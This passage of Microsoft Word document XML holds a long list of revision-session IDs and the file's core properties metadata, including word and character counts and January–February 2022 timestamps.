    <w:rsid w:val="47780AF0"/>
    <w:rsid w:val="477D10F6"/>
    <w:rsid w:val="479E25DE"/>
    <w:rsid w:val="47CB3DA8"/>
    <w:rsid w:val="47CD46C8"/>
    <w:rsid w:val="47DDADEA"/>
    <w:rsid w:val="4808D9D8"/>
    <w:rsid w:val="48103BF7"/>
    <w:rsid w:val="4860B5A0"/>
    <w:rsid w:val="4871BDD0"/>
    <w:rsid w:val="48C580CD"/>
    <w:rsid w:val="48D3364A"/>
    <w:rsid w:val="48D81DD1"/>
    <w:rsid w:val="48DA617B"/>
    <w:rsid w:val="490756DF"/>
    <w:rsid w:val="4925BEE2"/>
    <w:rsid w:val="492800CF"/>
    <w:rsid w:val="492E2040"/>
    <w:rsid w:val="493B8279"/>
    <w:rsid w:val="49549A44"/>
    <w:rsid w:val="4987FD16"/>
    <w:rsid w:val="49981629"/>
    <w:rsid w:val="49B4E985"/>
    <w:rsid w:val="49D68AC2"/>
    <w:rsid w:val="49F36542"/>
    <w:rsid w:val="49F465D4"/>
    <w:rsid w:val="4A26D659"/>
    <w:rsid w:val="4A4C83CA"/>
    <w:rsid w:val="4A5A6DB8"/>
    <w:rsid w:val="4A6E79E4"/>
    <w:rsid w:val="4A739615"/>
    <w:rsid w:val="4A93C40E"/>
    <w:rsid w:val="4A9FBB26"/>
    <w:rsid w:val="4AEF896D"/>
    <w:rsid w:val="4B02DE6A"/>
    <w:rsid w:val="4B13803A"/>
    <w:rsid w:val="4B2BBAFD"/>
    <w:rsid w:val="4B57C07D"/>
    <w:rsid w:val="4B98DC39"/>
    <w:rsid w:val="4BA3BE03"/>
    <w:rsid w:val="4BB8E09E"/>
    <w:rsid w:val="4BC28D94"/>
    <w:rsid w:val="4BECE32C"/>
    <w:rsid w:val="4BF63E19"/>
    <w:rsid w:val="4C719701"/>
    <w:rsid w:val="4C73233B"/>
    <w:rsid w:val="4C8AC242"/>
    <w:rsid w:val="4C8CC05F"/>
    <w:rsid w:val="4CA11CDC"/>
    <w:rsid w:val="4D02B967"/>
    <w:rsid w:val="4D2C0696"/>
    <w:rsid w:val="4D306114"/>
    <w:rsid w:val="4D911281"/>
    <w:rsid w:val="4DDF7084"/>
    <w:rsid w:val="4DEDFC3C"/>
    <w:rsid w:val="4DEE348D"/>
    <w:rsid w:val="4E20880D"/>
    <w:rsid w:val="4E9555DE"/>
    <w:rsid w:val="4E958ABA"/>
    <w:rsid w:val="4ECFE13F"/>
    <w:rsid w:val="4ED8337A"/>
    <w:rsid w:val="4EDB7A46"/>
    <w:rsid w:val="4EE90582"/>
    <w:rsid w:val="4EED3524"/>
    <w:rsid w:val="4F4E2C82"/>
    <w:rsid w:val="4F5BCB9F"/>
    <w:rsid w:val="4F871514"/>
    <w:rsid w:val="4F974253"/>
    <w:rsid w:val="4FAD23F6"/>
    <w:rsid w:val="4FD8BD9E"/>
    <w:rsid w:val="4FE603C3"/>
    <w:rsid w:val="4FF4ACF3"/>
    <w:rsid w:val="50087971"/>
    <w:rsid w:val="50194229"/>
    <w:rsid w:val="501D450B"/>
    <w:rsid w:val="5061F4DE"/>
    <w:rsid w:val="506801D6"/>
    <w:rsid w:val="508E001E"/>
    <w:rsid w:val="50AFBB33"/>
    <w:rsid w:val="50C9AF3C"/>
    <w:rsid w:val="50D19CC2"/>
    <w:rsid w:val="50DE99C1"/>
    <w:rsid w:val="50EAAB9B"/>
    <w:rsid w:val="50F67DE0"/>
    <w:rsid w:val="5123B358"/>
    <w:rsid w:val="5158F791"/>
    <w:rsid w:val="51943C24"/>
    <w:rsid w:val="519B44E0"/>
    <w:rsid w:val="51ABB249"/>
    <w:rsid w:val="51EE5B7F"/>
    <w:rsid w:val="52924E41"/>
    <w:rsid w:val="52A52FE2"/>
    <w:rsid w:val="52B5FE9C"/>
    <w:rsid w:val="52CEE315"/>
    <w:rsid w:val="52D20102"/>
    <w:rsid w:val="52E172F5"/>
    <w:rsid w:val="52F33AAC"/>
    <w:rsid w:val="532A1384"/>
    <w:rsid w:val="53694FCB"/>
    <w:rsid w:val="537FB007"/>
    <w:rsid w:val="538AC5C1"/>
    <w:rsid w:val="53D9E8F5"/>
    <w:rsid w:val="53F1298C"/>
    <w:rsid w:val="53F2B788"/>
    <w:rsid w:val="541A6167"/>
    <w:rsid w:val="5433B73E"/>
    <w:rsid w:val="54880C60"/>
    <w:rsid w:val="54909853"/>
    <w:rsid w:val="54D01959"/>
    <w:rsid w:val="54FEA2C3"/>
    <w:rsid w:val="554848E4"/>
    <w:rsid w:val="55515DE4"/>
    <w:rsid w:val="5571F813"/>
    <w:rsid w:val="55891881"/>
    <w:rsid w:val="55B4C2E6"/>
    <w:rsid w:val="55BA95F3"/>
    <w:rsid w:val="55DCD0A4"/>
    <w:rsid w:val="55EDAB78"/>
    <w:rsid w:val="55F9D7F7"/>
    <w:rsid w:val="56440A70"/>
    <w:rsid w:val="564BEA05"/>
    <w:rsid w:val="5677BAF5"/>
    <w:rsid w:val="567FA87B"/>
    <w:rsid w:val="569A7324"/>
    <w:rsid w:val="569E9671"/>
    <w:rsid w:val="56D25D21"/>
    <w:rsid w:val="5747E879"/>
    <w:rsid w:val="5769BE2D"/>
    <w:rsid w:val="5787CE2F"/>
    <w:rsid w:val="579B3132"/>
    <w:rsid w:val="579DC101"/>
    <w:rsid w:val="57CCCD9C"/>
    <w:rsid w:val="57D0269B"/>
    <w:rsid w:val="58364385"/>
    <w:rsid w:val="583A66D2"/>
    <w:rsid w:val="584CBEA4"/>
    <w:rsid w:val="5854F1E3"/>
    <w:rsid w:val="586EB93D"/>
    <w:rsid w:val="5878174C"/>
    <w:rsid w:val="588EE43E"/>
    <w:rsid w:val="58D99BE3"/>
    <w:rsid w:val="58DCAEA7"/>
    <w:rsid w:val="58FC496E"/>
    <w:rsid w:val="590F3BCF"/>
    <w:rsid w:val="59147166"/>
    <w:rsid w:val="596BF6FC"/>
    <w:rsid w:val="59AA38BE"/>
    <w:rsid w:val="59B7493D"/>
    <w:rsid w:val="59C625EA"/>
    <w:rsid w:val="59DC5BF7"/>
    <w:rsid w:val="59DE47D5"/>
    <w:rsid w:val="59F189A4"/>
    <w:rsid w:val="5A0030CB"/>
    <w:rsid w:val="5A0499B1"/>
    <w:rsid w:val="5A086AB5"/>
    <w:rsid w:val="5A093AB4"/>
    <w:rsid w:val="5A161B80"/>
    <w:rsid w:val="5A706F00"/>
    <w:rsid w:val="5A99DF68"/>
    <w:rsid w:val="5A9C06B7"/>
    <w:rsid w:val="5AA15EEF"/>
    <w:rsid w:val="5AEBBF11"/>
    <w:rsid w:val="5AFDA6DA"/>
    <w:rsid w:val="5B09164C"/>
    <w:rsid w:val="5B11D45F"/>
    <w:rsid w:val="5B8550D4"/>
    <w:rsid w:val="5BB75366"/>
    <w:rsid w:val="5BEFAEE5"/>
    <w:rsid w:val="5C2CE351"/>
    <w:rsid w:val="5C2DB434"/>
    <w:rsid w:val="5C3875A1"/>
    <w:rsid w:val="5C3D2F50"/>
    <w:rsid w:val="5C4DA5BF"/>
    <w:rsid w:val="5C506506"/>
    <w:rsid w:val="5C6D1298"/>
    <w:rsid w:val="5C721844"/>
    <w:rsid w:val="5CD66763"/>
    <w:rsid w:val="5CE62553"/>
    <w:rsid w:val="5D34B5CF"/>
    <w:rsid w:val="5D498C2B"/>
    <w:rsid w:val="5DB4DDE2"/>
    <w:rsid w:val="5DC50DDC"/>
    <w:rsid w:val="5DD763BD"/>
    <w:rsid w:val="5DD9582B"/>
    <w:rsid w:val="5E24259C"/>
    <w:rsid w:val="5E69FC47"/>
    <w:rsid w:val="5E82CCDA"/>
    <w:rsid w:val="5E864557"/>
    <w:rsid w:val="5ED08630"/>
    <w:rsid w:val="5EE55C8C"/>
    <w:rsid w:val="5F0618F6"/>
    <w:rsid w:val="5F29C74F"/>
    <w:rsid w:val="5F3328DF"/>
    <w:rsid w:val="5F4AB30F"/>
    <w:rsid w:val="5FF43953"/>
    <w:rsid w:val="60268AC1"/>
    <w:rsid w:val="60532E34"/>
    <w:rsid w:val="606C5691"/>
    <w:rsid w:val="6081B8A8"/>
    <w:rsid w:val="6087E16B"/>
    <w:rsid w:val="60A15CD2"/>
    <w:rsid w:val="60CD60CC"/>
    <w:rsid w:val="60EE1D73"/>
    <w:rsid w:val="6135E181"/>
    <w:rsid w:val="615465B8"/>
    <w:rsid w:val="6183625C"/>
    <w:rsid w:val="61C78BF6"/>
    <w:rsid w:val="6200E8AC"/>
    <w:rsid w:val="622DD9F9"/>
    <w:rsid w:val="62312C58"/>
    <w:rsid w:val="626D7F53"/>
    <w:rsid w:val="6289EDD4"/>
    <w:rsid w:val="629945BC"/>
    <w:rsid w:val="62E2F7F2"/>
    <w:rsid w:val="62FB13D6"/>
    <w:rsid w:val="631EB97C"/>
    <w:rsid w:val="63228D78"/>
    <w:rsid w:val="6326822A"/>
    <w:rsid w:val="635E2B83"/>
    <w:rsid w:val="6388CB25"/>
    <w:rsid w:val="63891C80"/>
    <w:rsid w:val="63B081FD"/>
    <w:rsid w:val="63B8CDAF"/>
    <w:rsid w:val="63BFA175"/>
    <w:rsid w:val="64722BDF"/>
    <w:rsid w:val="648B7ABF"/>
    <w:rsid w:val="6493F400"/>
    <w:rsid w:val="64ECDBBB"/>
    <w:rsid w:val="64F65E01"/>
    <w:rsid w:val="6519680C"/>
    <w:rsid w:val="65549E10"/>
    <w:rsid w:val="655AAF03"/>
    <w:rsid w:val="655B71D6"/>
    <w:rsid w:val="65AA3346"/>
    <w:rsid w:val="65C18E96"/>
    <w:rsid w:val="65E2A862"/>
    <w:rsid w:val="66261744"/>
    <w:rsid w:val="6632C34A"/>
    <w:rsid w:val="663FD793"/>
    <w:rsid w:val="66AFC50E"/>
    <w:rsid w:val="66C73515"/>
    <w:rsid w:val="66E822BF"/>
    <w:rsid w:val="66F00F4A"/>
    <w:rsid w:val="670B8A97"/>
    <w:rsid w:val="67273416"/>
    <w:rsid w:val="6753114C"/>
    <w:rsid w:val="67594E53"/>
    <w:rsid w:val="675D5EF7"/>
    <w:rsid w:val="67A9719B"/>
    <w:rsid w:val="67B2DD76"/>
    <w:rsid w:val="67CB94C2"/>
    <w:rsid w:val="67E9F8C0"/>
    <w:rsid w:val="681E2E23"/>
    <w:rsid w:val="68319CA6"/>
    <w:rsid w:val="68630576"/>
    <w:rsid w:val="687B7DD2"/>
    <w:rsid w:val="68A70FF6"/>
    <w:rsid w:val="68D54D51"/>
    <w:rsid w:val="690C373C"/>
    <w:rsid w:val="690CB429"/>
    <w:rsid w:val="692701E5"/>
    <w:rsid w:val="69342C27"/>
    <w:rsid w:val="6972FF6B"/>
    <w:rsid w:val="69E2FC6F"/>
    <w:rsid w:val="69F4CA79"/>
    <w:rsid w:val="6A052FC6"/>
    <w:rsid w:val="6A0F9AF4"/>
    <w:rsid w:val="6A1FC381"/>
    <w:rsid w:val="6A27B00C"/>
    <w:rsid w:val="6A45F256"/>
    <w:rsid w:val="6AC0B765"/>
    <w:rsid w:val="6AC39B6A"/>
    <w:rsid w:val="6ADF21D1"/>
    <w:rsid w:val="6AE2225B"/>
    <w:rsid w:val="6AFB47FE"/>
    <w:rsid w:val="6B0B7762"/>
    <w:rsid w:val="6B122380"/>
    <w:rsid w:val="6B1953DE"/>
    <w:rsid w:val="6B3431B5"/>
    <w:rsid w:val="6B4322BC"/>
    <w:rsid w:val="6B614FE2"/>
    <w:rsid w:val="6B6AAA5B"/>
    <w:rsid w:val="6B82A233"/>
    <w:rsid w:val="6C4B90AE"/>
    <w:rsid w:val="6C4D67A6"/>
    <w:rsid w:val="6C5EA2A7"/>
    <w:rsid w:val="6C5EA7AB"/>
    <w:rsid w:val="6C9B72DD"/>
    <w:rsid w:val="6C9F05E5"/>
    <w:rsid w:val="6CB89F65"/>
    <w:rsid w:val="6CD5182C"/>
    <w:rsid w:val="6CE48CEE"/>
    <w:rsid w:val="6D2F7DAC"/>
    <w:rsid w:val="6D3A4DC6"/>
    <w:rsid w:val="6D3CD088"/>
    <w:rsid w:val="6D44A585"/>
    <w:rsid w:val="6D5F50CE"/>
    <w:rsid w:val="6D671956"/>
    <w:rsid w:val="6D9E6320"/>
    <w:rsid w:val="6DDFA85F"/>
    <w:rsid w:val="6DE930D4"/>
    <w:rsid w:val="6E054939"/>
    <w:rsid w:val="6E20DFF8"/>
    <w:rsid w:val="6E32E8C0"/>
    <w:rsid w:val="6E5A46AE"/>
    <w:rsid w:val="6E8590D9"/>
    <w:rsid w:val="6EA0DE2A"/>
    <w:rsid w:val="6EAF713D"/>
    <w:rsid w:val="6EB6F8A6"/>
    <w:rsid w:val="6EF334A4"/>
    <w:rsid w:val="6EFB212F"/>
    <w:rsid w:val="6F0D3C7A"/>
    <w:rsid w:val="6F4DB779"/>
    <w:rsid w:val="6F5F01B4"/>
    <w:rsid w:val="6F6A3DE9"/>
    <w:rsid w:val="6F85C0E1"/>
    <w:rsid w:val="6F8A3E89"/>
    <w:rsid w:val="6F970C8D"/>
    <w:rsid w:val="6FBBBE0E"/>
    <w:rsid w:val="6FD6A6A7"/>
    <w:rsid w:val="7078269A"/>
    <w:rsid w:val="707ECFCE"/>
    <w:rsid w:val="710F8245"/>
    <w:rsid w:val="713A0150"/>
    <w:rsid w:val="7140E20C"/>
    <w:rsid w:val="7179D7AE"/>
    <w:rsid w:val="71AFF6D6"/>
    <w:rsid w:val="71B7C45C"/>
    <w:rsid w:val="71D140BF"/>
    <w:rsid w:val="71F97B4B"/>
    <w:rsid w:val="71FA4419"/>
    <w:rsid w:val="7263073A"/>
    <w:rsid w:val="72852CFA"/>
    <w:rsid w:val="72BCA92A"/>
    <w:rsid w:val="72DCB26D"/>
    <w:rsid w:val="73B5BD5F"/>
    <w:rsid w:val="73D1DDFA"/>
    <w:rsid w:val="740DB4A8"/>
    <w:rsid w:val="741BDC77"/>
    <w:rsid w:val="741F2E10"/>
    <w:rsid w:val="74398295"/>
    <w:rsid w:val="74BA115F"/>
    <w:rsid w:val="74CC7C5A"/>
    <w:rsid w:val="74F22C1B"/>
    <w:rsid w:val="751607A1"/>
    <w:rsid w:val="75170324"/>
    <w:rsid w:val="752B884A"/>
    <w:rsid w:val="75311C0D"/>
    <w:rsid w:val="75682523"/>
    <w:rsid w:val="75904CA8"/>
    <w:rsid w:val="75A74DDE"/>
    <w:rsid w:val="75C05710"/>
    <w:rsid w:val="75D97F6D"/>
    <w:rsid w:val="75EABA44"/>
    <w:rsid w:val="75F449EC"/>
    <w:rsid w:val="7601D8E2"/>
    <w:rsid w:val="760D7273"/>
    <w:rsid w:val="7612C1B8"/>
    <w:rsid w:val="7644D005"/>
    <w:rsid w:val="764A1828"/>
    <w:rsid w:val="764D48D1"/>
    <w:rsid w:val="76518273"/>
    <w:rsid w:val="76CCEC6E"/>
    <w:rsid w:val="76D4CFF6"/>
    <w:rsid w:val="76DACA9C"/>
    <w:rsid w:val="76E17194"/>
    <w:rsid w:val="7736785D"/>
    <w:rsid w:val="774B4C0E"/>
    <w:rsid w:val="775C2771"/>
    <w:rsid w:val="77A0AE2E"/>
    <w:rsid w:val="77B53D81"/>
    <w:rsid w:val="77D47468"/>
    <w:rsid w:val="780A9480"/>
    <w:rsid w:val="7869230B"/>
    <w:rsid w:val="78726012"/>
    <w:rsid w:val="787BEFE4"/>
    <w:rsid w:val="7883D60D"/>
    <w:rsid w:val="789ED5FE"/>
    <w:rsid w:val="78A525D0"/>
    <w:rsid w:val="78B09D83"/>
    <w:rsid w:val="78B78E8C"/>
    <w:rsid w:val="78C14770"/>
    <w:rsid w:val="78C4A592"/>
    <w:rsid w:val="78CD9CE9"/>
    <w:rsid w:val="78D708C5"/>
    <w:rsid w:val="78F7F7D2"/>
    <w:rsid w:val="78FD1E1E"/>
    <w:rsid w:val="793E0C9E"/>
    <w:rsid w:val="794BF3F1"/>
    <w:rsid w:val="79731726"/>
    <w:rsid w:val="797DB150"/>
    <w:rsid w:val="79814A4F"/>
    <w:rsid w:val="79FCF59C"/>
    <w:rsid w:val="79FEF96D"/>
    <w:rsid w:val="7A048D30"/>
    <w:rsid w:val="7A4C6DE4"/>
    <w:rsid w:val="7A5902A5"/>
    <w:rsid w:val="7A744B0C"/>
    <w:rsid w:val="7A7A8EC3"/>
    <w:rsid w:val="7A8740F3"/>
    <w:rsid w:val="7A9ED59B"/>
    <w:rsid w:val="7AACF090"/>
    <w:rsid w:val="7AAD8B8C"/>
    <w:rsid w:val="7AC5943B"/>
    <w:rsid w:val="7AD4905D"/>
    <w:rsid w:val="7B4A8965"/>
    <w:rsid w:val="7B7F6132"/>
    <w:rsid w:val="7BE08C8B"/>
    <w:rsid w:val="7BE35D06"/>
    <w:rsid w:val="7BED7615"/>
    <w:rsid w:val="7C111798"/>
    <w:rsid w:val="7C37861A"/>
    <w:rsid w:val="7C7CB3F7"/>
    <w:rsid w:val="7CB529AF"/>
    <w:rsid w:val="7CE97D69"/>
    <w:rsid w:val="7CFD70C0"/>
    <w:rsid w:val="7DCA8D6C"/>
    <w:rsid w:val="7DE7F34B"/>
    <w:rsid w:val="7DF3A6B1"/>
    <w:rsid w:val="7DF6C6CA"/>
    <w:rsid w:val="7E0EF81C"/>
    <w:rsid w:val="7E2B9100"/>
    <w:rsid w:val="7E32D3A2"/>
    <w:rsid w:val="7E3B6C57"/>
    <w:rsid w:val="7E4822A3"/>
    <w:rsid w:val="7E51648D"/>
    <w:rsid w:val="7ED0135D"/>
    <w:rsid w:val="7EE3F632"/>
    <w:rsid w:val="7F0780F3"/>
    <w:rsid w:val="7F07C5F5"/>
    <w:rsid w:val="7F0808F5"/>
    <w:rsid w:val="7F33D2BE"/>
    <w:rsid w:val="7F9282BF"/>
    <w:rsid w:val="7FB454B9"/>
    <w:rsid w:val="7FD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01B4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BB19120-F5E3-4340-9B81-E60A10E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206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1645</Words>
  <Characters>8885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5</cp:revision>
  <cp:lastPrinted>2022-02-02T21:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-30T19:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-02T21:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>